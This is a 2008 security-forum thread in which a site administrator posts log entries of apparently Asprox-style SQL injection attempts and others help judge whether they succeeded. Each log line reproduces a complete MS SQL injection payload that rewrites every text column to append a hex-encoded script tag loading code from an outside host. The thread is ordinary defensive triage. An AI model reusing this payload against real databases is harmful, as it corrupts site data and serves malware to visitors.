• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

SQL Injection attempts on our website

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Databases

View previous topic :: View next topic  
Author Message
Motiv
Just Arrived
Just Arrived


Joined: 17 Aug 2005
Posts: 0
Location: Seattle, WA

Offline

PostPosted: Thu Jun 05, 2008 3:07 pm    Post subject: SQL Injection attempts on our website Reply with quote

From the logs today:

2008-06-05 06:41:37 x.x.x.x GET /detail.aspx ID=5194;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 854 296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5194';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 3296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 0 1744 854 281
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 249


What do you all make of this? I don't think it was successful - The http return code was 403 forbidden. I've been through the database and code on our pages making sure no yay fun scripts were being called from CommieVille.
Back to top
View user's profile Send private message
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Thu Jun 05, 2008 3:32 pm    Post subject: Reply with quote

Somebody tried to run a script to inject malicious javascript onto your database. I am guessing that it is an Asprox variant.

http://www.bandnut.com/forum/forum_posts.asp?TID=19080
Back to top
View user's profile Send private message Visit poster's website
Motiv
Just Arrived
Just Arrived


Joined: 17 Aug 2005
Posts: 0
Location: Seattle, WA

Offline

PostPosted: Thu Jun 05, 2008 3:40 pm    Post subject: Reply with quote

How can I make sure it wasn't successful?

I read over the post on the link you provided and found none of those malicious files on the web server.

Which table in the database should I be looking at? looks like a table named cursor if I am reading right?
Back to top
View user's profile Send private message
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Thu Jun 05, 2008 3:51 pm    Post subject: Reply with quote

If the return code was a 403 error, then the attack was not successful. Are any of your webpages showing javascript that does not belong? I do not use asp or Microsoft SQL, so I don't know all that much about it, but there are quite a few pages that discuss it in depth. Perhaps one of them has detection measures.
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Databases All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Looking for more Windows Networking info?

Sign up to the WindowsNetworking.com Monthly Newsletter, written by Enterprise Security MVP Deb Shinder, containing news, the hottest tips, Networking links of the month and much more. Subscribe today and don't miss a thing!
View a sample newsletter.

Become a WindowsNetworking.com member!

Discuss your Windows Networking issues with thousands of other Windows Newtorking experts. Click here to join!

Community Area

Log in | Register

Readers' Choice

Which is your preferred data recovery solution?

Follow TechGenix on Twitter